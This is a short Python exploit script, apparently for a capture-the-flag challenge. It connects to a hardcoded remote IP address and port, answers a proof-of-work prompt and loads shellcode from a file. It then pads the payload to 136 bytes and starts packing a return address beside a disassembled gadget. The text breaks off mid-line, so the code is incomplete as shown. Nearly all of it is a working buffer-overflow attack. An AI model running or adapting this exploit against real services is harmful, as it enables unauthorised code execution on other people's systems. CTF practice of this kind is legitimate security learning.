#!/usr/bin/python import struct import socket import telnetlib SHELLCODE = open('test.o').read() assert '\n' not in SHELLCODE s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.connect(('127.0.0.1', 4444)) s.connect(('88.198.89.193', 2323)) f = s.makefile('rw', bufsize=0) while True: data = f.readline() if 'Whats Your Name?' in data: break if 'please give a base64' in data: value = data.strip().split(':')[1] print 'I need:', value proof = raw_input().strip() f.write(proof + '\n') payload = SHELLCODE.ljust(136, 'A') ''' 21ee: 48 8b c1 mov %rcx,%rax 21f1: 5e pop %rsi 21f2: 5d pop %rbp 21f3: c2 08 00 retq $0x8 ''' payload += struct.pack('